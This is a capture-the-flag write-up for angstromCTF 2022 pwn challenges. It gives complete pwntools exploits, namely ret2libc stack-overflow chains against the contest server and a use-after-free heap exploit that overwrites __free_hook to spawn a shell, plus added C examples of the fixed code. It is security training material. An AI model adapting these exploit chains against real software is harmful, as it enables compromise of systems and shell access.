angstromctf2022 reproduction

Over the May Day holiday I played two competitions at the same time. Although both are aimed at beginners, my own level is still some way from being good enough to compete, and it was hard to balance the two, which seems to have annoyed my seniors as well... But I have to admit that since hgame my pwn skills have basically not improved....

really obnoxious problem

A very basic stack overflow.

exp:

from pwn import *
from LibcSearcher import *

context.log_level = "debug"
# context.terminal = ["alacritty", "-e"]
context.terminal = ["tmux", "splitw", "-h"]

elf = ELF("./really_obnoxious_problem")

printf_plt = elf.plt["printf"]
printf_got = elf.got["printf"]
gets_got   = elf.got["gets"]

pop_rdi_ret = 0x4013f3
ret         = 0x401359

p = remote("challs.actf.co", "31225")
# p = process("./really_obnoxious_problem")

p.sendlineafter(b'Name: ', b'aaa')

payload  = b'a' * 0x40
payload += p64(elf.bss() + 0x800)
payload += p64(pop_rdi_ret)
payload += p64(printf_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(pop_rdi_ret)
payload += p64(gets_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(0x401346)
p.sendlineafter(b'Address: ', payload)

# gdb.attach(p)
printf_addr = u64(p.recv(6).ljust(8, b'\x00'))
gets_addr   = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(printf_addr))
print(hex(gets_addr))
libc        = LibcSearcher("printf", printf_addr)
libc.add_condition("gets", gets_addr)
libc_base   = printf_addr - libc.dump("printf")
system_addr = libc_base   + libc.dump("system")
binsh_addr  = libc_base   + libc.dump("str_bin_sh")

payload  = b'a' * 0x48
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
p.sendline(payload)

p.interactive()

whereami

Also the most basic stack overflow. Honestly, the two challenges feel no different, and the exp is basically the same.
exp:

from pwn import *
from LibcSearcher import *

context.log_level = "debug"
# context.terminal = ["alacritty", "-e"]
context.terminal = ["tmux", "splitw", "-h"]

elf = ELF("./whereami")

printf_plt = elf.plt["printf"]
printf_got = elf.got["printf"]
gets_got   = elf.got["gets"]

pop_rdi_ret = 0x401303
ret         = 0x40101a

p = remote("challs.actf.co", "31222")
# p = process("./whereami")

payload  = b'a' * 0x40
payload += p64(elf.bss() + 0x800)
payload += p64(pop_rdi_ret)
payload += p64(printf_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(pop_rdi_ret)
payload += p64(gets_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(0x401266)
p.sendline(payload)

p.recvline()
p.recvline()
# gdb.attach(p)
printf_addr = u64(p.recv(6).ljust(8, b'\x00'))
gets_addr   = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(printf_addr))
print(hex(gets_addr))
libc        = LibcSearcher("printf", printf_addr)
libc.add_condition("gets", gets_addr)
libc_base   = printf_addr - libc.dump("printf")
system_addr = libc_base   + libc.dump("system")
binsh_addr  = libc_base   + libc.dump("str_bin_sh")

payload  = b'a' * 0x48
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
p.sendline(payload)

p.interactive()
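Both challenges above come down to the same root cause: an unbounded gets() into a fixed 0x40-byte stack buffer, so anything past the buffer runs into the saved frame pointer and the return address (which is why both payloads pad with 0x40 bytes, then 8 more, before the ROP chain). The C example below is added here and is not from the writeup or the challenge source; it shows the bounded replacement a developer would want, a line reader that refuses input that does not fit instead of truncating silently or running off the end. The buffer size NAME_LEN and the function names are assumptions.

```c
/* Added example, not the challenge's code. Bounded line reading in place of gets(). */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 64  /* assumed: the same 0x40-byte buffer the payloads pad to */

/* Vulnerable shape shared by both challenges, shown for contrast only:
 *   char name[NAME_LEN];
 *   gets(name);   // no bound: bytes past 64 overwrite the saved rbp and return address
 */

/* Copy one line from src (srclen bytes, not necessarily NUL-terminated) into dst,
 * writing at most dstlen bytes including the terminator.
 * Returns the number of input bytes consumed (line body plus its newline), or -1
 * if the line does not fit, in which case dst is left empty and nothing is consumed. */
long copy_line_bounded(const char *src, size_t srclen, char *dst, size_t dstlen) {
    if (dstlen == 0) return -1;
    size_t n = 0;
    while (n < srclen && src[n] != '\n') n++;       /* length of the line body */
    if (n >= dstlen) { dst[0] = '\0'; return -1; }  /* need n + 1 bytes for the NUL */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (long)(n < srclen ? n + 1 : n);          /* skip the newline if there was one */
}

/* The challenge's flow: a name, then an address, each into a NAME_LEN buffer.
 * Returns 0 if both fit, 1 if the name was rejected, 2 if the address was rejected. */
int read_name_and_address(const char *input, size_t len, char *name, char *addr) {
    long used = copy_line_bounded(input, len, name, NAME_LEN);
    if (used < 0) return 1;
    if (copy_line_bounded(input + used, len - (size_t)used, addr, NAME_LEN) < 0) return 2;
    return 0;
}

int main(void) {
    char name[NAME_LEN], addr[NAME_LEN];
    const char *ok = "alice\n123 Main St\n";                            /* constructed input */
    printf("short input -> %d (%s / %s)\n",
           read_name_and_address(ok, strlen(ok), name, addr), name, addr);
    char big[82];                                                       /* constructed 80-byte name */
    memset(big, 'a', 80); big[80] = '\n'; big[81] = '\0';
    printf("80-byte name -> %d (rejected)\n", read_name_and_address(big, 81, name, addr));
    return 0;
}
```

The check that matters is `n >= dstlen`: a line of exactly NAME_LEN - 1 characters is the longest that fits with its terminator, and anything longer is refused before a single byte is copied, so the saved frame is never reachable from input.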

Dreams

libc 2.31. The vulnerability is fairly simple: a dangling pointer leads to a UAF and a double free, and the UAF lets you modify the first 8 bytes of a chunk. The limitation is that you can only allocate five chunks of size 0x1C.
The main idea:
First leak a heap address and modify the next pointer to point into the dreams array, which gives control of the first pointer.
Then point the first pointer at the GOT to leak libc.
Then point it at __free_hook and overwrite __free_hook with system.

from pwn import *

context.log_level = "debug"
# context.terminal = ["alacritty", "-e"]
context.terminal = ["tmux", "splitw", "-h"]

elf  = ELF("./dreams")
libc = ELF("./libc.so.6")

free_got = elf.got["free"]

p = process("./dreams")

def sleep(index, date, about):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'dream? ', index)
    p.sendafter(b'(mm/dd/yy))? ', date)
    p.sendafter(b'about? ', about)

def sell(index):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'in? ', index)

sleep(b'0', b'111111', b'abcd')
sleep(b'1', b'111111', b'abcd')
sell(b'0')
sell(b'1')

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'1')
p.recvuntil(b'that ')
heap_addr = u64(p.recv(4).ljust(8, b'\x00'))
print(hex(heap_addr))
p.sendafter(b'New date: ', p32(heap_addr + 0x290))
sleep(b'2', b'/bin/sh\x00', b'aaaa')
sleep(b'3', p32(heap_addr), b'\x00' * 0x10) # dreams[3] -> &dreams[0]
sleep(b'2', b'/bin/sh\x00', b'aaaa')

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'3')
p.sendafter(b'New date: ', p32(heap_addr))

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'0')
p.sendafter(b'New date: ', b'aaaaaaaa')

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'3')
p.sendafter(b'New date: ', p32(free_got))

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'0')
p.recvuntil(b'that ')
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
p.sendafter(b'New date: ', b'a')
print(hex(puts_addr))

libc_base = puts_addr - libc.sym["puts"]
system    = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

p.sendlineafter(b'> ', b'3 ')                # not sure why, but unless a space is appended to the later options and indexes, the program has trouble reading the input
p.sendlineafter(b'trouble? ', b'3 ')
p.sendafter(b'New date: ', p64(free_hook)[:7])
print(hex(free_hook))

p.sendlineafter(b'> ', b'3 ')
p.sendlineafter(b'trouble? ', b'0 ')
p.sendafter(b'New date: ', p64(system)[:7])
print(hex(system))

sell(b'2')

p.interactive()
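The Dreams bug is a dangling pointer: selling a dream frees the chunk but leaves dreams[i] pointing at it, which is what allows the second free and the edit-after-free that the exp relies on. As an added example (not the challenge's source or the writeup's code), here is the corrected shape of the three operations in C: index validation on every path, the slot cleared after free, and edits refused on empty slots. The struct layout, the slot count and the function names are assumptions based on the writeup's description (five 0x1C-byte chunks, date in the first 8 bytes).

```c
/* Added example, not the challenge's code. Fixed allocate / sell / edit for a slot table. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_DREAMS 5

/* Assumed layout: 8-byte date followed by a 20-byte description, 0x1C bytes in total. */
struct dream { char date[8]; char about[20]; };

static struct dream *dreams[MAX_DREAMS];

/* Vulnerable shape (the challenge's bug, for contrast only):
 *   free(dreams[i]);      // the slot keeps the dangling pointer
 *   // sell(i) again -> double free; edit(i) -> write into a freed chunk (UAF)
 */

/* Bounded copy of a NUL-terminated field; never writes past dstlen bytes. */
static void copy_field(char *dst, size_t dstlen, const char *src) {
    size_t n = 0;
    while (n < dstlen - 1 && src[n] != '\0') n++;
    memcpy(dst, src, n);
    dst[n] = '\0';
}

/* Option 1: allocate. Rejects an out-of-range index or an already occupied slot. */
int sleep_dream(int i, const char *date, const char *about) {
    if (i < 0 || i >= MAX_DREAMS || dreams[i] != NULL) return -1;
    struct dream *d = calloc(1, sizeof *d);
    if (d == NULL) return -1;
    copy_field(d->date, sizeof d->date, date);
    copy_field(d->about, sizeof d->about, about);
    dreams[i] = d;
    return 0;
}

/* Option 2: free. A second sell of the same slot is refused because the slot is empty. */
int sell_dream(int i) {
    if (i < 0 || i >= MAX_DREAMS || dreams[i] == NULL) return -1;
    free(dreams[i]);
    dreams[i] = NULL;   /* the fix: no dangling pointer survives the free */
    return 0;
}

/* Option 3: edit the date. Refused when the slot holds no live allocation. */
int edit_date(int i, const char *date) {
    if (i < 0 || i >= MAX_DREAMS || dreams[i] == NULL) return -1;
    copy_field(dreams[i]->date, sizeof dreams[i]->date, date);
    return 0;
}

/* Read back a slot's date ("" for an empty slot), so callers can verify state. */
const char *dream_date(int i) {
    if (i < 0 || i >= MAX_DREAMS || dreams[i] == NULL) return "";
    return dreams[i]->date;
}

int main(void) {
    printf("sleep 0      -> %d\n", sleep_dream(0, "111111", "abcd"));
    printf("sell 0       -> %d\n", sell_dream(0));
    printf("sell 0 again -> %d (refused: slot already empty)\n", sell_dream(0));
    printf("edit 0       -> %d (refused: no write through a freed slot)\n", edit_date(0, "222222"));
    return 0;
}
```

With the slot cleared on free, the two primitives the exp chains (double free to corrupt the tcache next pointer, edit-after-free to steer it) are both refused at the index check, and the bounded copy keeps the date edit from ever writing past the 8-byte field.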